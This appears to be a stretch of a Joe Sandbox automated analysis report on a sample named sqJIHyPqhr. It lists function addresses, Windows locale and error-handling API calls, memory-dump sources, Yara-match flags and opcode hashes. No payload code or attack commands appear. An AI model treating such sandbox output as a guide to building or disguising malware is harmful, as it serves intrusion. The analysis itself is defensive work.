EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024D0A1C,?,024DBC89,00000000,?,?,?), ref: 024DB5A6

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 1289fd5e8a029b290c88f4e954d417245e98fe40db6c9358a909b01abc6dfa31
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 3911C23A2007059FDB189F39C8B16BABB92FF8475CB19482EDA4687B40D771A542CB40

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 024DBADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024DB87A,00000000,00000000,?), ref: 024DBB08

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 52a5fe72f5feb53bb5888ab0087b40cfcd99244da23517cc52fd4f99c522f7f8
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: 1FF0F936A001156BDB289A25CC55BBB7758EB4075CF06446ADD05A3644EB70BE42C6D0

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 024DB8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

Part of subcall function 024D2141: _free.LIBCMT ref: 024D21A0
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024DB900

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction ID: c1f2bb2c091bac6530f121d6f1f09d1e997cfddd8b9c4bfef878f678abe44761
Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction Fuzzy Hash: FD014432B512449BCB14EF34DCA0ABA33A9DF48311F0542FFEE02DB281DA759D058B50

Function 024DB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024D0A1C,?,024DBC4D,024D0A1C,?,?,?,?,?,024D0A1C,?,?), ref: 024DB61B

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: f0675982ec6a7e94de63587888102ba0d27a4eaf1f5b316d4bc50b3159fa4bbd
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: 8DF0C23A3007045FDB245F39DCA1B7A7B95EF8176CF16442EFA058B650D7B198028A44

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 024D5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024D047A,?,00000004), ref: 024D547A

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: fa67da4856af227c24ec5d8e6d38348c37a7ac4764499c5ca9ca2c593da69cc3
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: 87F0BB31680318BFDB115F61DC11F6E7B66EF04F12F90415AFD0566290DF729D20AA9A

Function 024D5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024CE654: RtlEnterCriticalSection.NTDLL(02050DAF), ref: 024CE663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024D506C

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: f9a6a2098fcce84ac4b6d6a85d0e98edfcf93c5a673bda32751b6d9cbabb0433
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: 40F03C36A20304DBE710EF69D905B9D77E1AF05722F10416AF900DB2E1CB7999448F59

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 024DB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024DBCAB,024D0A1C,?,?,?,?,?,024D0A1C,?,?,?), ref: 024DB520

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: d6dedad8ebb09f833aa810bd6a3fd29549b27645a4d6e1017e93e7fea36cd041
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 80F0A03A30020957CB089F36D86576ABF94EFC1754B5A405EEF098B290D675A942C790

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 024B08CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,024AFE60), ref: 024B08D2

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 024C76EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: f5dc45d908b2bfc607a62fccd2d7529f5df9a9a2915fbff514806d1b75aa630e
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: F0D1E93A1085A30BD7AE4A3D847003BFFF56A421A132D47AFD4F7CA6C2EE24D555DA60

Function 024C7FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 2f7a8353aeb90aa2e6ec2132656e863588cab7c4eb3835bde98abb4697ebb6b6
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: B691883A1090A34AE7AB463E847403FFFE15A422B572A079FD4F3CA2C5EF24C555DA20

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 024C8289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: ba01b5596e1314e8bcca5289ee68cc037320f24e333720dd533c03d1f8659f52
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0591767A1080E34ADBAB467D853813FFFE15A421A532A07AFD4F2CA2D5FF24C555D620

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 024C7D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 3ddaec53211faab93544a76803c46cb5bcee69ff1cbc619161e7ade9a0916668
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: C891427A2090A30BDBA9463D857413FFEE99A411A572A079FE4F3CB2C1EF24C554DE20

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 024CD755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 82ce25e423075e3c183663622c344e6a83120bbc9a5fd827f9e39d21bf72f057
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 7761357DE04B04E6DAB86A2C8890BBF6395AF41A08F34143FE856DB3C4D7259982C775

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 024C7A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 0010edea7b5c5155df289c795bf04f9025734430a3bee2392a7eb5ac990eb0ea
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 3081547A2080A34BEBA9467E847403FFFE55A411A532A079FD4F3CB2C5FF148265DA20

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 024C87C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 665b4b57edae77b2c7eb8ebc4ab95a35a49b29bf35be8fe958a681f6b7fb7d5e
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: CF11087F2090424796D7862ED8B42BBE395EAC522873D567FD0414BF58D332E145D620

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 009D9D33 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009D9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d9000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
